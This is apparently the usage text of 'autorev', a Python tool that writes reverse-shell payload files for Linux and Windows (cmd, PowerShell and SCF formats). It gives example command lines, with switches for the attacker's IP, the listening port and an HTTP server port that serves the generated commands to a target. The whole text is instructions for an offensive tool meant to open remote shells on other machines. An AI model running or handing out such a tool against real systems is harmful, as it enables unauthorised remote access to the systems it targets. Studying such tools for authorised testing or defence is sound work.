The Python Script will generate a (.) extension file with reverse shell codes then you can execute the script on the target [support windows and linux both]
python3 <path to autorev>/ -i -p 443 -s 8000
python3 <path to autorev>/ -i -p 443 -s 8000 -f winc
python3 <path to autorev>/ -i -p 443 -s 8000 -f winp
python3 -i <your-ip> -p <your-port> -o <scf-file-name> -f scf
All Usage commands will be also generated and print according to the given switches
-h, --help HELP show this help message and exit
-i IPADDR, --ipaddr IPADDR LHOST Attacker IP address
-p PORT, --port PORT LPORT Port to get reverse shell on [Default 9001]
-o OUT, --out OUT Output File Name [Excluding (.)extension Extension][OPTIONAL]
-f FORMAT, --format FORMAT Define Format for generator [lin | win[c/p](c = cmd | p = powershell) | scf][Default=lin]
-s SERVER, --server SERVER Port to use for generating commands (http://[your-ip]:[PORT]) (Default 80)